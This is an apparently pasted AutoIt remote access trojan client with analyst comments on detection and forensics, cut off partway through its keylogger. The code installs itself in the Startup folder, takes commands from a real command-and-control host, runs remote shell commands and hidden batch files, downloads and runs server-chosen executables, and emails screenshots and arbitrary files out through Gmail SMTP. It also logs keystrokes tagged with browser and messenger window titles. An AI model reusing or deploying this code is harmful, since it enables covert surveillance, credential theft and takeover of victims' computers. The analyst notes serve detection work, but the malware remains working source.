
Untitled

a guest
Mar 19th, 2017
  1. #include <InetConstants.au3>
  2. #include <MsgBoxConstants.au3>
  3. #include <WinAPIFiles.au3>
  4. #include <Misc.au3>
  5. #include <WindowsConstants.au3>
  6. #include <AutoItConstants.au3>
  7. #include <ScreenCapture.au3>
  ; Analyst note: start-up section of the client. It names the expected
  ; executable, copies the running script into the per-user Startup folder when
  ; no file of that name is present there (logon persistence), and initialises
  ; the state used by the command-polling loop that follows.
  8. ;this is the client side version of a silly rat i am working on
  9. Global $exename = "ratattempt.exe"
  10. ;stage will controll what the rat is doing locally, for example. stage 0 is look for instructions
  11. If Not FileExists(@StartupDir & "/" & $exename) Then
  12. FileCopy(@ScriptFullPath, @StartupDir) ; persistence: a new executable in the Startup folder is a practical detection point
  13. EndIf
  14. Global $herenum = 0 ; for use in hiddenshell
  15. Global $sURL = 'http://isavigualco.000webhostapp.com/' ; C2 base URL; the polling calls in this listing hard-code the same host instead of using this variable
  16. Global $num = 1 ; counter appended to every poll URL (index.php?=<n>)
  17. Global $stage = 0 ; current command state; 0 = poll the server for a command
  18. While(BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) <> "keylog")
  19. ;While (true)
  20. ;rat must get instructions
  21. Sleep(4000)
  ; Analyst note: command dispatcher (stage 0). Every poll is a plain-HTTP GET
  ; of index.php?=<num>; the response body is compared with one command keyword
  ; and, on a match, $stage is set to the number of the matching handler loop.
  ; $num is incremented after each poll, so each keyword is looked up under a
  ; different counter value. No handler for stage -1 ("instructions") appears
  ; in this listing.
  ; Detection: repeated GET requests to the same host with a steadily
  ; increasing bare "?=<n>" query string; the traffic is unencrypted and
  ; unauthenticated, so it is visible to proxy and network monitoring.
  22. while ($stage == 0);read commands
  23. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "instructions" Then
  24. $stage = -1;
  25. EndIf
  26. $num = $num + 1
  27.  
  28. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "keylog" Then
  29. $stage = 1;
  30. EndIf
  31. $num = $num + 1
  32. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "cmd" Then
  33. $stage = 2;
  34. EndIf
  35. $num = $num + 1
  36. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "printscreen" Then
  37. $stage = 3;
  38. EndIf
  39. $num = $num + 1
  40. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "kill" Then
  41. $stage = 4;
  42. EndIf
  43. $num = $num + 1
  44. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "troll" Then
  45. $stage = 5;
  46. EndIf
  47. $num = $num + 1
  48.  
  49. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "obliterate" Then
  50. $stage = 6;
  51. EndIf
  52. $num = $num + 1
  53. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "flipout" Then
  54. $stage = 7;
  55. EndIf
  56. $num = $num + 1
  57. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "closecommonapps" Then
  58. $stage = 8;
  59. EndIf
  60. $num = $num + 1
  61. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "hiddenshell" Then
  62. $stage = 9;
  63. EndIf
  64. $num = $num + 1
  65. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "download" Then
  66. $stage = 10;
  67. EndIf
  68. $num = $num + 1
  69. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "hprintscreen" Then
  70. $stage = 11;
  71. EndIf
  72. $num = $num + 1
  73. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "upload" Then
  74. $stage = 12;
  75. EndIf
  76. $num = $num + 1
  77.  
  78.  
  79. WEnd
  ; Analyst note: "cmd" handler (stage 2). Starts cmd.exe when the
  ; _Singleton("cmd.exe") call returns non-zero, relaunches the Startup-folder
  ; copy of the client after 30 s, then types text fetched from the server with
  ; Send() followed by ENTER, repeating until the server answers "returnzero".
  ; Send() types into whichever window has focus at that moment.
  ; Risk: the typed text comes from an unauthenticated plain-HTTP response, so
  ; whoever controls or can alter that response decides what is executed.
  ; Detection: cmd.exe started by the client process, and the client starting a
  ; second instance of itself from the Startup folder.
  80. While($stage == 2);cmd
  81. If _Singleton("cmd.exe") <> 0 Then
  82. Run("cmd.exe")
  83. EndIf
  84. ;Run( @startupdir & "/" & $exename)
  85. Sleep(30000)
  86. Run( @startupdir & "/" & $exename)
  87. $num = $num + 1
  88. Global $cmdline = BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num))
  89. $num = $num + 1
  90. Send($cmdline)
  91. Send("{ENTER}")
  92.  
  93. While BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) <> "returnzero"
  94. $num = $num + 1
  95. $cmdline = BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num))
  96. Sleep(10000)
  97. Send($cmdline)
  98. Send("{ENTER}")
  99.  
  100. WEnd
  101. $num = $num + 1
  102. If _Singleton("cmd.exe") = 0 Then
  103. ProcessClose ( "cmd.exe" )
  104. EndIf
  105.  
  106. $stage = 0
  107. WEnd
  ; Analyst note: "printscreen" handler (stage 3). Sends message 274
  ; (WM_SYSCOMMAND) with wParam 61808 (SC_MONITORPOWER) to the Progman window,
  ; first with lParam 2 and, at the end of the handler, with lParam -1; saves a
  ; screen capture to <Documents>\GDIPlus_Image1.jpg; then, when two
  ; MouseGetPos() readings taken 30 s apart compare equal (presumably an idle
  ; check), opens cmd.exe, starts PowerShell in it and types a Send-MailMessage
  ; command that attaches the image and relays it through smtp.gmail.com:587.
  ; The literal text "pass" is typed at the credential prompt.
  ; Detection: GDIPlus_Image1.jpg appearing in the Documents folder; a
  ; cmd.exe -> powershell.exe chain under the client; outbound SMTP submission
  ; (TCP 587) from a workstation; PowerShell script-block logging records the
  ; typed Send-MailMessage command.
  108. While ($stage == 3);printscreen
  109. Local $hDLL = DllOpen("USER32.dll")
  110. DllCall($hDLL, "int", "SendMessage", "hwnd", WinGetHandle("classname=Progman"), "int", 274, "int", 61808, "int", 2);
  111. _ScreenCapture_Capture(@MyDocumentsDir & "\GDIPlus_Image1.jpg")
  112. $num = $num + 1
  113. While($stage = 3)
  114. Global $mouseposition = MouseGetPos()
  115. Sleep(30000)
  116. Global $mousepositios = MouseGetPos()
  117. if $mouseposition == $mousepositios Then
  118. Sleep(3000)
  119. Run("cmd.exe")
  120. Sleep(1000)
  121. Send("Start Powershell")
  122. Send("{ENTER}")
  123. Sleep(7000)
  124. Send("Send-MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body o ");
  125. ;Send($filecontent);
  126. ;FileClose($file)
  127. Send(" -SmtpServer smtp.gmail.com -Credential isavigualco@gmail.com -UseSsl -Port 587 -DeliveryNotificationOption never")
  128. Send(" -Attachments ")
  129. Send(@MyDocumentsDir)
  130.  
  131. Send("\GDIPlus_Image1.jpg")
  132. ;Send($date)
  133. ;Send(".htm"); -MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body o -SmtpServer smtp.gmail.com -Credential isavigualco@gmail.com -UseSsl -Port 587 -DeliveryNotificationOption never -Attachments C
  134.  
  135. Send("{ENTER}")
  136. Sleep(2000)
  137. Send("pass");
  138.  
  139. Send("{ENTER}")
  140. ;FileOpen($log)
  141. Sleep(60000)
  142. ProcessClose("cmd.exe")
  143. ProcessClose("Powershell.exe")
  144. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
  145. $stage = 0;
  146.  
  147. EndIf
  148. Sleep(30000)
  149.  
  150. EndIf
  151. $stage = 0;
  152.  
  153. WEnd
  154.  
  155. DllCall($hDLL, "int", "SendMessage", "hwnd", WinGetHandle("classname=Progman"), "int", 274, "int", 61808, "int", -1)
  156. Wend
  ; Analyst note: "kill" handler (stage 4). Closes cmd.exe, powershell.exe and
  ; the process named in $exename, then exits with code 0. Nothing is deleted
  ; here, so the Startup-folder copy stays on disk and would start again at the
  ; next logon; responders still have to remove it.
  157. While($stage == 4);kill
  158. ProcessClose("cmd.exe")
  159. ProcessClose("powershell.exe")
  160. ProcessClose($exename)
  161. Exit 0
  162.  
  163. Wend
  ; Analyst note: "troll" handler (stage 5). Nuisance behaviour: types the
  ; letter "e" into the focused window every 10 s and polls the server, leaving
  ; the loop when the response is "returnzero".
  164. While($stage == 5);troll
  165. Send("e")
  166. Sleep(10000)
  167. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
  168. $stage = 0;
  169. EndIf
  170. $num = $num + 1
  171. WEnd
  ; Analyst note: "obliterate" handler (stage 6), the self-removal command.
  ; Closes cmd.exe and powershell.exe, deletes the Startup-folder copy,
  ; %TEMP%\setup.exe and %TEMP%\testandofileopen.bat, and closes the process
  ; named in $exename.
  ; Forensics: the three paths deleted here are the on-disk artefacts written by
  ; the persistence, download and hiddenshell features. The keylogger's log
  ; directory (<script dir>\log) is not touched by this handler.
  172. While($stage == 6);obliterate
  173. ProcessClose("cmd.exe")
  174. ProcessClose("powershell.exe")
  175. FileDelete(@StartupDir & "/" & $exename)
  176. FileDelete(@TempDir & "\setup.exe")
  177. FileDelete(@TempDir & "/testandofileopen.bat", $FO_APPEND)
  178. ProcessClose($exename)
  179. FileDelete(@TempDir & "\setup.exe")
  180. WEnd
  ; Analyst note: "flipout" handler (stage 7). Nuisance behaviour: on each pass,
  ; when Random(0,10,1) returns more than 7, sends a Ctrl+Alt+Down key sequence,
  ; and on a second independent draw a Ctrl+Alt+Del key sequence. It then polls
  ; the server and switches to stage 0, 4 or 6 on "returnzero", "kill" or
  ; "obliterate".
  181. While($stage == 7);flipout
  182. Sleep(3000)
  183. if Random(0,10,1) > 7 Then
  184. Send("{CTRLDOWN}")
  185. Send("{ALTDOWN}")
  186. Send("{DOWN}")
  187. Send("{ALTUP}")
  188. Send("{CTRLUP}")
  189.  
  190. Endif
  191. $num = $num + 1
  192. Sleep(3000)
  193. if Random(0,10,1) > 7 Then
  194. Send("{CTRLDOWN}")
  195. Send("{ALTDOWN}")
  196. Send("{DEL}")
  197. Send("{ALTUP}")
  198. Send("{CTRLUP}")
  199. Endif
  200. Sleep(3000)
  201. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
  202. $stage = 0;
  203. EndIf
  204. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "kill" Then
  205. $stage = 4;
  206. EndIf
  207. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "obliterate" Then
  208. $stage = 6;
  209. EndIf
  210.  
  211. WEnd
  ; Analyst note: "closecommonapps" handler (stage 8). Closes chrome.exe,
  ; iexplore.exe, winword.exe, powerpnt.exe, firefox.exe, mspaint.exe and
  ; notepad.exe by process name, polling the server between groups and
  ; switching stage on "returnzero", "kill" or "obliterate".
  ; Impact: availability only; any unsaved work in those applications is lost.
  ; Detection: one process terminating several unrelated user applications in
  ; quick succession.
  212. While($stage == 8);closeapps
  213. If _Singleton("cmd.exe") = 0 Then
  214. ProcessClose ( "cmd.exe" )
  215. EndIf
  216. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
  217. $stage = 0;
  218. EndIf
  219. $num = $num + 1
  220.  
  221. ProcessClose("chrome.exe")
  222.  
  223.  
  224. ;ProcessClose("chrome.exe")
  225.  
  226. ;iexplore.exe
  227.  
  228. ProcessClose("iexplore.exe" )
  229.  
  230.  
  231. ProcessClose("winword.exe" )
  232.  
  233.  
  234. ProcessClose("powerpnt.exe")
  235.  
  236. $num = $num + 1
  237. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
  238. $stage = 0;
  239. EndIf
  240. $num = $num + 1
  241. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "kill" Then
  242. $stage = 4;
  243. EndIf
  244. $num = $num + 1
  245. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "obliterate" Then
  246. $stage = 6;
  247. EndIf
  248.  
  249. ProcessClose("firefox.exe")
  250.  
  251.  
  252. ProcessClose("mspaint.exe")
  253.  
  254.  
  255. ProcessClose("notepad.exe")
  256.  
  257. $num = $num + 1
  258. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
  259. $stage = 0;
  260. EndIf
  261.  
  262. WEnd
  ; Analyst note: "hiddenshell" handler (stage 9). Appends lines fetched from
  ; the server to %TEMP%\testandofileopen.bat and, when the server answers
  ; "close", closes the file and calls WScript.Shell.Run on the literal path
  ; C://temp/testandofileopen.bat with window style 0 (hidden).
  ; Risk: script content is taken from an unauthenticated plain-HTTP response
  ; with no integrity check.
  ; Artefacts and detection: a .bat file created in %TEMP% by the client;
  ; cmd.exe started through WScript.Shell with a hidden window; both batch-file
  ; paths named above are worth searching for during triage.
  263. While($stage == 9);HIDDENSHELL
  264.  
  265. Sleep(12000)
  266.  
  267. if $herenum = 0 then
  268. Local $oShell = ObjCreate("shell.application")
  269. $herenum = $herenum + 1
  270. $ShellObj=ObjCreate("WScript.Shell")
  271. $file = FileOpen(@TempDir & "/testandofileopen.bat", $FO_APPEND)
  272. Endif
  273. $num = $num + 1
  274.  
  275. $num = $num + 1
  276. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) <> "close" Then
  277. FileWriteLine($file,BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) )
  278. EndIf
  279. $num = $num + 1
  280.  
  281. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "close" Then
  282. FileClose($file)
  283. $num = $num + 1
  284. $ShellObj.Run("C://temp/testandofileopen.bat", 0)
  285. $num = $num + 1
  286. $ShellObj = Null
  287. $herenum = 0;
  288. $num = $num + 1
  289. EndIf
  290. sleep(5000)
  291. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
  292. $stage = 0
  293.  
  294. EndIf
  295. WEnd
  ; Analyst note: "download" handler (stage 10). Reads a URL from the server
  ; response, downloads it to %TEMP%\Setup.exe with InetGet, waits while
  ; @InetGetActive is set, then launches %TEMP%\setup.exe with ShellExecute and
  ; returns to stage 0.
  ; Risk: a second-stage payload is fetched from a server-chosen URL and run
  ; with no signature or hash verification.
  ; Detection and mitigation: an executable written to %TEMP% and started by the
  ; same process shortly afterwards; application control that blocks execution
  ; from user-writable directories stops this step.
  296. While($stage == 10);Download and run
  297. Sleep(30000)
  298. Local $FileURL = BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num))
  299. Local $FileName = @TempDir & "\Setup.exe"
  300. ;$FileSaveLocation = FileSaveDialog("Save Location...",@ScriptDir,"All (*.*)",18,$FileName)
  301. $FileSize = InetGetSize($FileURL)
  302.  
  303. InetGet($FileURL,$FileName,0,1)
  304. While @InetGetActive
  305. $Percentage = @InetGetBytesRead * 100 / $FileSize
  306. ProgressSet($Percentage,"Downloaded " & @InetGetBytesRead & " of " & $FileSize & " bytes","Downloading " & $FileName)
  307. Sleep(250)
  308. Wend
  309. ProgressOff()
  310. ShellExecute (@TempDir & "\setup.exe") ; you may use Run (), RunWait () or ShellExecuteWait depending on setup.exe
  311. ;If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
  312. $stage = 0
  313.  
  314. ;EndIf
  315. WEnd
  ; Analyst note: "hprintscreen" handler (stage 11), the hidden variant of the
  ; screenshot command. Saves a screen capture to
  ; <Documents>\GDIPlus_Image1.jpg, starts powershell.exe, hides its window with
  ; @SW_HIDE and uses ControlSend to type a Send-MailMessage command that
  ; attaches the image and relays it through smtp.gmail.com:587. It then waits
  ; for, hides and fills in the credential prompt, typing the literal text
  ; "pass", and deletes the image afterwards.
  ; The credential prompt is matched by its Portuguese window title, so this
  ; code path depends on a Portuguese-language Windows installation.
  ; Detection: powershell.exe started by the client with no visible window;
  ; outbound SMTP submission (TCP 587) from a workstation; PowerShell
  ; script-block logging records the typed Send-MailMessage command.
  316. While($stage == 11);hprintscreen
  317. ; Run('calc')
  318. ;Sleep(1000)
  319. ;WinWait('Calculator')
  320. ;Sleep(1000) ; Hide window with next line
  321. ;WinSetState('Calculator', '', @SW_HIDE)
  322. ;ControlClick('Calculator', '', '6')
  323. ;ControlClick('Calculator', '', '+')
  324. ;ControlClick('Calculator', '', '6')
  325. ;ControlClick('Calculator', '', '=')
  326. ;Sleep(1000) ; Show window with next line
  327. ;WinSetState('Calculator', '', @SW_SHOW)
  328. _ScreenCapture_Capture(@MyDocumentsDir & "\GDIPlus_Image1.jpg")
  329. $num = $num + 1
  330. While($stage = 11)
  331. Global $mouseposition = MouseGetPos()
  332. Sleep(30000)
  333. Global $mousepositios = MouseGetPos()
  334. if $mouseposition == $mousepositios Then
  335. Sleep(3000)
  336. Run("powershell.exe")
  337. WinWait("Windows PowerShell")
  338. WinSetState("Windows PowerShell", "", @SW_HIDE)
  339. ;Send("Start Powershell")
  340. ;Send("{ENTER}")
  341. ;Sleep(7000)
  342. ControlSend("Windows PowerShell","", "","Send-MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body o ");
  343. ;Send($filecontent);
  344. ;FileClose($file)
  345. ControlSend("Windows PowerShell","", ""," -SmtpServer smtp.gmail.com -Credential isavigualco@gmail.com -UseSsl -Port 587 -DeliveryNotificationOption never")
  346. ControlSend("Windows PowerShell","", ""," -Attachments ")
  347. ControlSend("Windows PowerShell","", "",@MyDocumentsDir)
  348.  
  349. ControlSend("Windows PowerShell", "","","\GDIPlus_Image1.jpg")
  350. ;Send($date)
  351. ;Send(".htm"); -MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body o -SmtpServer smtp.gmail.com -Credential isavigualco@gmail.com -UseSsl -Port 587 -DeliveryNotificationOption never -Attachments C
  352.  
  353. ControlSend("Windows PowerShell","", "","{ENTER}")
  354. ;Sleep(2000);Solicitação de credenciais do Windows PowerShell
  355. WinWait("Solicitação de credenciais do Windows PowerShell")
  356. WinSetState("Solicitação de credenciais do Windows PowerShell", "", @SW_HIDE)
  357. ControlSend("Solicitação de credenciais do Windows PowerShell","", "","pass")
  358.  
  359. ControlSend("Solicitação de credenciais do Windows PowerShell","", "","{ENTER}")
  360. ;FileOpen($log)
  361. Sleep(60000)
  362. ProcessClose("cmd.exe")
  363. ProcessClose("Powershell.exe")
  364. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
  365. $stage = 0;
  366.  
  367. EndIf
  368. Sleep(30000)
  369. FileDelete(@MyDocumentsDir & "\GDIPlus_Image1.jpg")
  370. EndIf
  371. $stage = 0;
  372. WEnd
  373. WEnd
  ; Analyst note: "upload" handler (stage 12). Treats a server response as a
  ; local file path; when FileExists() confirms it, starts a hidden
  ; powershell.exe and types a Send-MailMessage command whose -Attachments value
  ; is a path fetched from the server, relayed through smtp.gmail.com:587.
  ; Risk: exfiltration of any file the logged-on user can read, at a path chosen
  ; by the server.
  ; Detection: powershell.exe started by the client with no visible window;
  ; outbound SMTP submission (TCP 587) from a workstation; PowerShell
  ; script-block logging records the command and the attached path.
  374. While($stage == 12);upload
  375. Sleep(12000)
  376. $num = $num + 1
  377. If FileExists(BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num))) Then
  378. Sleep(3000)
  379. Run("powershell.exe")
  380. WinWait("Windows PowerShell");dir<carpeta> >> files.txt
  381. WinSetState("Windows PowerShell", "", @SW_HIDE)
  382. $num = $num + 1
  383. ;Send("Start Powershell")
  384. ;Send("{ENTER}")
  385. ;Sleep(7000)
  386. ControlSend("Windows PowerShell","", "","Send-MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body o ");
  387. ;Send($filecontent);
  388. ;FileClose($file)
  389. ControlSend("Windows PowerShell","", ""," -SmtpServer smtp.gmail.com -Credential isavigualco@gmail.com -UseSsl -Port 587 -DeliveryNotificationOption never")
  390. ControlSend("Windows PowerShell","", ""," -Attachments ")
  391. ControlSend("Windows PowerShell","", "",BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)))
  392.  
  393. ;ControlSend("Windows PowerShell", "","","\GDIPlus_Image1.jpg")
  394. ;Send($date)
  395. ;Send(".htm"); -MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body o -SmtpServer smtp.gmail.com -Credential isavigualco@gmail.com -UseSsl -Port 587 -DeliveryNotificationOption never -Attachments C
  396.  
  397. ControlSend("Windows PowerShell","", "","{ENTER}")
  398. ;Sleep(2000);Solicitação de credenciais do Windows PowerShell
  399. WinWait("Solicitação de credenciais do Windows PowerShell")
  400. WinSetState("Solicitação de credenciais do Windows PowerShell", "", @SW_HIDE)
  401. ControlSend("Solicitação de credenciais do Windows PowerShell","", "","pass")
  402.  
  403. ControlSend("Solicitação de credenciais do Windows PowerShell","", "","{ENTER}")
  404. ;FileOpen($log)
  405. Sleep(60000)
  406. ProcessClose("cmd.exe")
  407. ProcessClose("Powershell.exe")
  408. $num = $num + 1
  409. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
  410. $stage = 0;
  411.  
  412. EndIf
  413.  
  414. EndIf
  415. WEnd
  416.  
  417. WEnd
  418.  
  419.  
  420.  
  421.  
  422.  
  423.  
  424.  
  425.  
  426.  
  427.  
  428.  
  429.  
  430.  
  431.  
  432.  
  433.  
  434.  
  435.  
  436. ;While($stage == 1);Keylogger
  437. ;======================================== Variables ============================================
  ; Analyst note: keylogger set-up. This code follows the main polling loop,
  ; whose condition ends once the server response is "keylog". It opens
  ; user32.dll, creates <script dir>\log and opens
  ; logfiles<YYYYMMDD>.htm inside it, exiting if the file cannot be opened.
  ; Artefact: an HTML log file under a "log" directory next to the executable.
  438. $hDll=DllOpen("user32.dll")
  439. $window2=""
  440. Global $date=@year&@mon&@mday
  441. $log=@ScriptDir&"/log"; path to the log directory
  442. $keystroke=""
  443. ;$hexKey = '0x' & $hexKey
  444. ;===============================================================================================
  445.  
  446. ;======================================== Directory ============================================
  447. DirCreate ($log)
  448. $file = FileOpen($log&"\logfiles"&$date&".htm", 1+256) ; create the log file that stores the captured content (UTF-8)
  449. If $file = -1 Then ; exit on error
  450. Exit
  451. EndIf
  452.  
  453. filewrite($file,'<font face=Verdana size=1>')
  454.  
  455. ;Send-MailMessage -To $to -From $MyEmail -Subject $Subject -Body $Body -SmtpServer $SMTP -Credential (Get-Credential -Credential "$MyEmail")
  456.  
  457. ;-UseSsl -Port 587 -DeliveryNotificationOption never
  458. ;===============================================================================================
  459.  
  ; Closes the user32.dll handle held in $hDll and exits the program with
  ; code 0. The key-polling loop calls it when _IsPressed('6A') reports the
  ; key with virtual-key code 0x6A (numpad multiply) as pressed.
  460. Func terminate()
  461. DllClose($hDll)
  462. Exit 0
  463. EndFunc
  464. ;Send-MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body body -SmtpServer smtp.gmail.com -Credential (Get-Credential -Credential "isavigualco@gmail.com")-UseSsl -Port 587 -DeliveryNotificationOption never
  465. ;======================================== LogWrite ============================================
  466.  
  ; Appends one captured key to the open log file.
  ;   $what2log - text to record for the key (a character or a {NAME} token).
  ; The title of the active window is compared with the last one seen
  ; ($window2). When it is unchanged the text is written as is; when it has
  ; changed, $window2 is updated and, for the applications listed below, an
  ; HTML header carrying a timestamp and the window title is written ahead of
  ; the text.
  ; Analyst note: the log therefore ties keystrokes to named browser and
  ; messenger windows, which is what makes it useful for credential theft.
  467. Func _LogKeyPress($what2log)
  468. $window=WinGetTitle("")
  469. Switch $window
  470. Case $window2
  471. FileWrite($file,$what2log)
  472. Sleep(100)
  473. Case Else
  474. $window2=$window
  475.  
  476.  
  477. $main="<b>["& @Year&"."&@mon&"."&@mday&" "&@HOUR & ":" &@MIN & ":" &@SEC & '] Window: "'& $window& '"</b></br>'& $what2log
  478.  
  479.  
  480. If $window="Yahoo! Messenger" then
  481. FileWrite($file, '<br><BR><img src="yahoo.png" width=30 height=30>' & $main)
  482. ElseIf StringInStr($window,"Google Chrome") then
  483. FileWrite($file, '<br><BR><img src="chrome.png" width=30 height=30>' & $main)
  484. ElseIf StringInStr($window,"Mozilla Firefox") then
  485. FileWrite($file, '<br><BR><img src="Firefox.png" width=30 height=30>' & $main)
  486. ElseIf StringInStr($window,"Windows Internet Explorer") then
  487. FileWrite($file, '<br><BR><img src="IE.png" width=30 height=30>' & $main)
  488. EndIf ; set an icon for some common programs to make the log easier to follow
  489.  
  490. sleep (100)
  491. EndSwitch
  492. EndFunc
  493.  
  494. ;===============================================================================================
  495.  
  496. $Dllcall = DllOpen("user32.dll")
  497.  
  498. ;Open the DLL so that _IsPressed, the keylogger's main function, can be used
  499.  
  500. ;======================================== Alphabets ============================================
  501. While 1
  502.  
  503. If _IsPressed('6A',$Dllcall) Then
  504. local $a
  505. $a=terminate()
  506. EndIf
  507.  
  508. If _IsPressed(41,$Dllcall) Then ;if return 1
  509. _LogKeyPress("a")
  510. EndIf
  511.  
  512.  
  513. If _IsPressed(42,$Dllcall) Then
  514. _LogKeyPress("b")
  515. EndIf
  516.  
  517.  
  518. If _IsPressed(43,$Dllcall) Then
  519. _LogKeyPress("c")
  520. EndIf
  521.  
  522.  
  523. If _IsPressed(44,$Dllcall) Then
  524. _LogKeyPress("d")
  525. EndIf
  526.  
  527.  
  528. If _IsPressed(45,$Dllcall) Then
  529. _LogKeyPress("e")
  530. EndIf
  531.  
  532.  
  533. If _IsPressed(46,$Dllcall) Then
  534. _LogKeyPress("f")
  535. EndIf
  536.  
  537.  
  538. If _IsPressed(47,$Dllcall) Then
  539. _LogKeyPress("g")
  540. EndIf
  541.  
  542.  
  543. If _IsPressed(48,$Dllcall) Then
  544. _LogKeyPress("h")
  545. EndIf
  546.  
  547.  
  548. If _IsPressed(49,$Dllcall) Then
  549. _LogKeyPress("i")
  550. EndIf
  551.  
  552.  
  553. If _IsPressed('4a',$Dllcall) Then
  554. _LogKeyPress("j")
  555. EndIf
  556.  
  557.  
  558. If _IsPressed('4b',$Dllcall) Then
  559. _LogKeyPress("k")
  560. EndIf
  561.  
  562.  
  563. If _IsPressed('4c',$Dllcall) Then
  564. _LogKeyPress("l")
  565. EndIf
  566.  
  567.  
  568. If _IsPressed('4d',$Dllcall) Then
  569. _LogKeyPress("m")
  570. EndIf
  571.  
  572.  
  573. If _IsPressed('4e',$Dllcall) = 1 Then
  574. _LogKeyPress("n")
  575. EndIf
  576.  
  577.  
  578. If _IsPressed('4f',$Dllcall) Then
  579. _LogKeyPress("o")
  580. EndIf
  581.  
  582.  
  583. If _IsPressed(50,$Dllcall) Then
  584. _LogKeyPress("p")
  585. EndIf
  586.  
  587.  
  588. If _IsPressed(51,$Dllcall) Then
  589. _LogKeyPress("q")
  590. EndIf
  591.  
  592.  
  593. If _IsPressed(52,$Dllcall) Then
  594. _LogKeyPress("r")
  595. EndIf
  596.  
  597.  
  598. If _IsPressed(53,$Dllcall) Then
  599. _LogKeyPress("s")
  600. EndIf
  601.  
  602.  
  603. If _IsPressed(54,$Dllcall) Then
  604. _LogKeyPress("t")
  605. EndIf
  606.  
  607.  
  608. If _IsPressed(55,$Dllcall) Then
  609. _LogKeyPress("u")
  610. EndIf
  611.  
  612.  
  613. If _IsPressed(56,$Dllcall) Then
  614. _LogKeyPress("v")
  615. EndIf
  616.  
  617.  
  618. If _IsPressed(57,$Dllcall) Then
  619. _LogKeyPress("w")
  620. EndIf
  621.  
  622.  
  623. If _IsPressed(58,$Dllcall) Then
  624. _LogKeyPress("x")
  625. EndIf
  626.  
  627.  
  628. If _IsPressed(59,$Dllcall) Then
  629. _LogKeyPress("y")
  630. EndIf
  631.  
  632. If _IsPressed('5a',$Dllcall) Then
  633. _LogKeyPress("z")
  634. EndIf
  635.  
  636. ;========================================================================================
  637.  
  638. ;=================================== Numbers ===========================================
  639. If _IsPressed('30',$Dllcall) Then
  640. _LogKeyPress("0")
  641. EndIf
  642.  
  643.  
  644. If _IsPressed('31',$Dllcall) Then
  645. _LogKeyPress("1")
  646. EndIf
  647.  
  648.  
  649. If _IsPressed('32',$Dllcall) Then
  650. _LogKeyPress("2")
  651. EndIf
  652.  
  653.  
  654. If _IsPressed('33',$Dllcall) Then
  655. _LogKeyPress("3")
  656. EndIf
  657.  
  658.  
  659. If _IsPressed('34',$Dllcall) Then
  660. _LogKeyPress("4")
  661. EndIf
  662.  
  663.  
  664. If _IsPressed('35',$Dllcall) Then
  665. _LogKeyPress("5")
  666. EndIf
  667.  
  668.  
  669. If _IsPressed('36',$Dllcall) Then
  670. _LogKeyPress("6")
  671. EndIf
  672.  
  673.  
  674. If _IsPressed('37',$Dllcall) Then
  675. _LogKeyPress("7")
  676. EndIf
  677.  
  678.  
  679. If _IsPressed('38',$Dllcall) Then
  680. _LogKeyPress("8")
  681. EndIf
  682.  
  683.  
  684. If _IsPressed('39',$Dllcall) Then
  685. _LogKeyPress("9")
  686. EndIf
  687. ;===================================================================================
  688.  
  689.  
  690. ;=================================== Keystrokes ====================================
  691. If _IsPressed('20',$Dllcall) Then
